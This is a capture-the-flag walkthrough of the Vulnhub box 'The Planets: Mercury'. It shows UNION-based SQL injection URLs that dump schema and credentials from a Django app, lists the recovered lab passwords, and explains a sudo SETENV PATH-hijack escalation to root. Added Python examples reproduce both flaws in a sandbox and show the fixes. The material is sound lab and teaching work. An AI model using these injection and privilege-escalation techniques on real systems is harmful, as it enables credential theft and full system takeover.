Vulnhub - THE PLANETS: MERCURY
Introduction
Mercury is an easier box with no bruteforcing required. There are two flags: a user flag and a root flag, each of which includes an MD5 hash.
This is THE PLANETS: MERCURY from vulnhub.
Ports
This box has SSH on port 22 and HTTP on port 8080. The nmap service/version scan reports:
8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2
HTTP
The frontpage just says:
Hello. This site is currently in development please check back later.
robots.txt just disallows /. Viewing the page source doesn't give any hints either, but requesting a page that doesn't exist produces a useful error, a Django debug 404 page listing the URL patterns the app tried:
So what can we learn from this? There is a URL at mercuryfacts, the server is running Django (Python), and DEBUG is turned on, which is why a 404 leaks the URL patterns. Let's look at mercuryfacts.
mercuryfacts
http://192.168.1.116:8080/mercuryfacts/ has a picture of Mercury, along with links to Load a fact and a todo list. The todo list says:
Add CSS.
Implement authentication (using users table)
Use models in django instead of direct mysql call
All the other stuff, so much!!!
So MySQL is being called directly, presumably with a hand-built query string rather than Django's ORM. Sounds like SQLi.
Facts
The facts page has a URL scheme like so:
http://192.168.1.116:8080/mercuryfacts/2/
Where the number (2 in this case) can be changed to return a different fact. A higher number that has no row returns an empty result:
Fact id: 10. ()
Putting a quote into the id, like this:
http://192.168.1.116:8080/mercuryfacts/'%20ORDER%20BY%201--+/
returns a huge page of debugging information (the Django debug traceback for the resulting database error), which is very helpful: it confirms the id is dropped straight into the query. Ultimately I did this manually, with these commands:
http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(fact)%20from%20facts/
This provided all of the facts, just for interest
http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(distinct%20table_schema)%20from%20information_schema.tables/
This provided the database (schema) names: information_schema and mercury.
http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%3D'mercury'/
This provided the table names in mercury: facts and users (we want users).
http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%3D'users'/
This provided the column names (username, password).
And finally this provided the data we want (MySQL's group_concat takes several arguments and concatenates them, which is what joins username and password with a colon):
http://192.168.1.116:8080/mercuryfacts/1%20UNION%20SELECT%20group_concat(username,':',password)%20from%20mercury.users/
We ended up with four sets of credentials:
john:johnny1987
laura:lovemykids111
sam:lovemybeer111
webmaster:mercuryisthesizeof0.056Earths
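To make the chain above reproducible offline, here is an added example (mine, not code from the box or from this walkthrough) that reconstructs the "direct mysql call" pattern the todo list mentions in Python against an in-memory SQLite stand-in, runs the same UNION payloads through it, and shows the parameterised lookup that stops them. The schema, the rows and the function names are assumptions; SQLite's sqlite_master and pragma_table_info stand in for MySQL's information_schema, and `||` for MySQL's multi-argument group_concat.

```python
import sqlite3

# Constructed stand-in for the box's 'mercury' MySQL database. The walkthrough
# shows a facts table and a users(username, password) table; the rows below are
# invented sample data, not the box's contents.
SCHEMA = """
CREATE TABLE facts (id INTEGER PRIMARY KEY, fact TEXT);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO facts VALUES (1, 'Mercury is the closest planet to the Sun.');
INSERT INTO facts VALUES (2, 'Mercury has no moons.');
INSERT INTO users VALUES (1, 'alice', 'example-pass-1');
INSERT INTO users VALUES (2, 'bob', 'example-pass-2');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fact_vulnerable(conn, fact_id):
    """Hypothetical reconstruction of the 'direct mysql call' pattern: whatever
    came in from the URL is pasted into the SQL text, so the caller controls
    the structure of the query, not just a value in it."""
    cur = conn.cursor()
    cur.execute("SELECT fact FROM facts WHERE id = " + fact_id)
    return [row[0] for row in cur.fetchall()]


def fact_safe(conn, fact_id):
    """The fix: validate the id and let the driver bind it as a parameter.
    The SQL text is constant, so no input can add a UNION to it."""
    try:
        fact_id = int(fact_id)
    except ValueError:
        return []
    cur = conn.cursor()
    cur.execute("SELECT fact FROM facts WHERE id = ?", (fact_id,))
    return [row[0] for row in cur.fetchall()]


# The walkthrough's UNION chain, translated from MySQL to SQLite's catalogue.
# Fact id 10 has no row (the page shows "Fact id: 10. ()"), so the only row
# that comes back is the one contributed by the injected SELECT.
PAYLOADS = {
    "tables": "10 UNION SELECT group_concat(name) FROM sqlite_master WHERE type='table'",
    "columns": "10 UNION SELECT group_concat(name) FROM pragma_table_info('users')",
    "creds": "10 UNION SELECT group_concat(username || ':' || password) FROM users",
}


def dump_via_union(conn, lookup=fact_vulnerable):
    """Run each payload through the given lookup. A key maps to None when the
    injection returned no row, i.e. when the lookup is not injectable."""
    results = {}
    for name, payload in PAYLOADS.items():
        rows = lookup(conn, payload)
        results[name] = rows[0] if rows else None
    return results


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup:", dump_via_union(db))
    print("parameterised lookup:", dump_via_union(db, fact_safe))
```

Run it and the vulnerable lookup hands back table names, column names and username:password pairs through what is meant to be a fact lookup; the same payloads through fact_safe return nothing, because the driver binds the id as a value and the SQL text never changes. On the real box the fix is the todo list's own item: use Django models, or at the very least cursor.execute with parameters, instead of building the query string by hand.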
SSH
Ultimately only the webmaster credentials work for SSH. Enumerating webmaster's home directory we find some notes, from which we can grab another set of credentials:
Privesc
We can use these new credentials to su to linuxmaster.
linuxmaster can run a script called check_syslog.sh as root, and the sudo rule carries the SETENV tag, which lets us set environment variables on the sudo command line. The script runs tail without an absolute path, so we can create our own executable named tail in a directory we control, then run the script through sudo with PATH overridden to put that directory first (sudo PATH=$PWD:$PATH followed by the script's path); the script then runs our tail as root. Here's what that looks like:
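The mechanism, as an added example that is neither the original screenshot nor the box's script: a throw-away directory gets a stand-in check_syslog.sh that calls tail by bare name, a hardened copy that calls it by absolute path with a fixed PATH, and an attacker-controlled tail; each script is then run with that directory prepended to PATH, which is what sudo does with the script when the sudoers entry carries SETENV and PATH is supplied on the command line. Script contents, file names and the log lines are invented, and no sudo is needed to run it.

```python
import os
import shutil
import subprocess
import tempfile

# Stand-in for the box's check_syslog.sh (invented contents): tail is called by
# bare name, so whichever 'tail' is first in the caller's PATH gets executed.
VULNERABLE = """#!/bin/sh
tail -n 5 "$1"
"""

# Hardened variant: a fixed PATH and an absolute path to the binary, so the
# caller's environment cannot change which tail runs. {real_tail} is filled in
# from shutil.which so the example runs on any layout.
FIXED = """#!/bin/sh
PATH=/usr/bin:/bin
{real_tail} -n 5 "$1"
"""

# The attacker's 'tail'. Under sudo this would run as root; here it only
# reports which user it ran as.
FAKE_TAIL = """#!/bin/sh
echo "HIJACKED as $(id -un)"
"""


def write_exec(path, content):
    with open(path, "w") as f:
        f.write(content)
    os.chmod(path, 0o755)


def run_with_hijacked_path(script, hijack_dir, logfile):
    """Run script with hijack_dir prepended to PATH (the effect of
    'sudo PATH=$PWD:$PATH script' under a SETENV rule) and return its last line."""
    env = dict(os.environ, PATH=hijack_dir + os.pathsep + os.environ.get("PATH", ""))
    proc = subprocess.run([script, logfile], env=env,
                          capture_output=True, text=True, check=True)
    return proc.stdout.strip().splitlines()[-1]


def demo():
    """Returns (last line from the vulnerable script, last line from the fixed one)."""
    work = tempfile.mkdtemp()
    try:
        logfile = os.path.join(work, "syslog")
        with open(logfile, "w") as f:
            f.write("line1\nline2\nline3\n")          # constructed log content
        vuln = os.path.join(work, "check_syslog.sh")
        fixed = os.path.join(work, "check_syslog_fixed.sh")
        write_exec(vuln, VULNERABLE)
        write_exec(fixed, FIXED.format(real_tail=shutil.which("tail")))
        write_exec(os.path.join(work, "tail"), FAKE_TAIL)   # our 'tail', same dir
        return (run_with_hijacked_path(vuln, work, logfile),
                run_with_hijacked_path(fixed, work, logfile))
    finally:
        shutil.rmtree(work)


if __name__ == "__main__":
    hijacked, safe = demo()
    print("vulnerable script:", hijacked)
    print("fixed script:     ", safe)
```

The vulnerable script prints the fake tail's message while the fixed one prints the real last log line, with an identical PATH in both runs. The defensive lesson is the same one sudo's secure_path exists for: a script run with elevated privileges must not let the caller decide which binaries it executes, so call them by absolute path or reset PATH yourself before doing anything else.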
This wasn’t too complicated but I enjoyed it. Thanks SirFlash.